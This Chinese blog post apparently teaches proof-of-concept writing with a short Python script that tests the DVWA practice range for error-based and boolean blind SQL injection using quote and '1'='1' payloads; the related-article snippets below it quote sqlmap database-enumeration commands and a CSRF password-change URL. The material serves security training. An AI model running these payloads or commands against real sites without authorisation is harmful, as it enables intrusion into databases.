poc练习-dvwa靶场sql注入(盲注)

最新推荐文章于 2024-07-03 22:07:19 发布
最新推荐文章于 2024-07-03 22:07:19 发布
阅读量333 收藏
点赞数
分类专栏: poc 文章标签: sql python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44248518/article/details/129198406
版权

使用Python进行的poc编写练习,针对dvwa靶场的sql注入,包括回显注入和盲注

import requests
import re

# sql注入检测
def sql_inj(url2, headers):
    payload = '\''
    url_last = url2[0] + '=' + payload + '&' + url2[2] + '=' + url2[3]
    r = requests.get(url=url_last, headers=headers)
    res = str(r.content)
    if re.search('SQL syntax', res):
        print('存在sql回显注入漏洞')
    else:
        return


# sql盲注
def sqlblind_inj(url2, headers):
    payload1 = "1' and '1'='1"
    payload2 = "1' and '1'='2"
    url_test1 = url2[0] + '=' + payload1 + '&' + url2[2] + '=' + url2[3]
    url_test2 = url2[0] + '=' + payload2 + '&' + url2[2] + '=' + url2[3]
    r1 = requests.get(url=url_test1, headers=headers)
    r2 = requests.get(url=url_test2, headers=headers)
    str1 = str(r1.content)
    str2 = str(r2.content)
    if re.search("First name", str1) and not re.search("First name", str2):
        print('存在sql盲注漏洞')
    else:
        return


if __name__ == '__main__':
    # dvwa靶场sql注入url(包含id parameter)
    url = input('请输入测试URL:')
    url2 = re.split('=|&', url)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Cookie': 'security=low; PHPSESSID=2c1f805aaa4d3cf042c42e70a1043003'
    }
    sql_inj(url2, headers)
    sqlblind_inj(url2, headers)
kuangfreedom
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | 2万字总结】SQL盲注?这一篇就够了。
等风来
06-16 1万+
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询。在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效。但在盲注(Blind)注入中,攻击者无法直接获取到这些信息,因此称之为"盲注"。在盲注攻击中,攻击者通过构造恶意的注入语句,将其输入传递给应用程序处理。然后,攻击者观察应用程序的响应或其他可见的行为来确定注入是否成功,并进一步探测和利用数据库中的数据。在本文中,我们深入探讨了。
DVWA靶场练习三—CSRF
afei001
05-04 714
CSRF介绍 CSRF跨站点请求伪造(Cross-Site Request Forgery)是一种攻击,它迫使最终用户在当前已通过身份验证的Web应用程序上执行不需要的操作。CSRF攻击专门针对状态更改请求而不是数据窃取,因为攻击者无法看到对伪造请求的响应。在社交工程的一点帮助下(例如通过电子邮件或聊天发送链接),攻击者可能会欺骗Web应用程序的用户执行攻击者选择的操作。如果...
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWA靶场SQL注入POC
hovcfuti的博客
10-31 131
学习编写poc,先从最简单的DVWA靶场sql注入练习
DVWA靶场SQL注入
最新发布
Tangyoo的博客
07-03 1113
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
sql注入pythonpoco_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_39991531的博客
12-11 141
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument('-u',dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
SQL注入POC
weixin_30731305的博客
03-03 494
mysql #encoding=utf-8importhttplibimporttimeimportstringimportsysimportrandomimporturllibheaders={'User-Agent':'Mozilla/5.0(Linux;U;Android2.3.6;en-us;NexusSBuild/GRK39F)Apple...
一个简单sql注入poc
weixin_30279315的博客
12-13 570
最近在提高自己编程能力,拿一些实用的小工具练下。该脚本为python语言,主要涉及模块urllib,re。 功能:验证CmsEasy5.5爆账号密码 实验用源码:http://pan.baidu.com/s/1i4lAwBF 搭建环境:phpstudy     试了IIs+php没爆出来最好用phpstudy。 通过浏览器访问确认存在漏洞存在。 用python来实现。 i...
Dvwa练习06 SQL注入(Low)
coco3105的博客
02-19 1152
等级low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
DVWA靶场安装及通关_dvwa靶场下载,总结一下
m0_61068088的博客
04-05 976
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
DVWA--CSRF(全难度)
wwxxee
02-20 1077
DVWA–CSRF(跨站请求伪造) 原理参考:网络安全笔记-99-渗透-CSRF 逻辑 在输入框中输入新密码,可修改当前用户的密码。 难度分级 Low 通过BP抓包,可以发现修改密码的请求是GET方式,直接修改GET请求参数就可以完成密码修改。 只要访问该链接即可修改密码: http://192.168.17.141/DVWA/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 在BP里
DVWAsql注入——盲注
Williamanddog的博客
12-22 3101
DVWA盲注
Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_33910434的博客
12-18 302
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequests importargparse parser=argparse.ArgumentParser() parser.add_argument('-u',dest="url") args=parser.parse_args() url=args.ur...
sql注入pythonpoc_SQL注入POC
weixin_39702714的博客
12-17 252
#encoding=utf-8importhttplibimportrequestsimporttimeimportstringimportsyspayloads= list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive Oracle info' % ...
sqlmap对dvwa进行sql注入
weixin_52971422的博客
04-01 4758
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
sql注入pythonpoc_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_35517006的博客
02-11 191
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument(‘-u‘,dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
DVWA—使用sqlmap工具get注入
@一只躺平的猪@的博客
07-08 1928
使用phpstudy搭建的DVWA靶场SQL盲注 burpsuite sqlmap下载安装sqlmap https://javaforall.cn/126449.html修改DVWA靶场安全级别为Low 本章介绍了sqlmap关于get注入的使用步骤以及攻击的相关语句。
37-4 用Python编写SQL注入的基于错误报告的POC
weixin_43263566的博客
04-22 178
SQL注入是一种常见的应用程序安全漏洞,发生在应用程序与数据库层之间。简而言之,它是通过在输入的字符串中注入SQL指令来实现的,如果程序设计不良未进行充分检查,那么这些注入的指令就可能被数据库服务器误认为是正常的SQL指令而被执行,导致数据泄露或系统被入侵。SQL注入漏洞的原理是在输入的数据中插入SQL代码,以利用应用程序对输入数据的不完善验证。对于分类中的每种类型,都需要针对性地设计相应的防御策略,并在代码编写和测试阶段进行充分的安全审查和测试。
使用pocDVWA(security=low)进行sql注入盲注攻击
07-12
以下是一个简单的POC(Proof of Concept)来对DVWA进行SQL注入盲注攻击: 1. SQL注入攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli/?id=" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值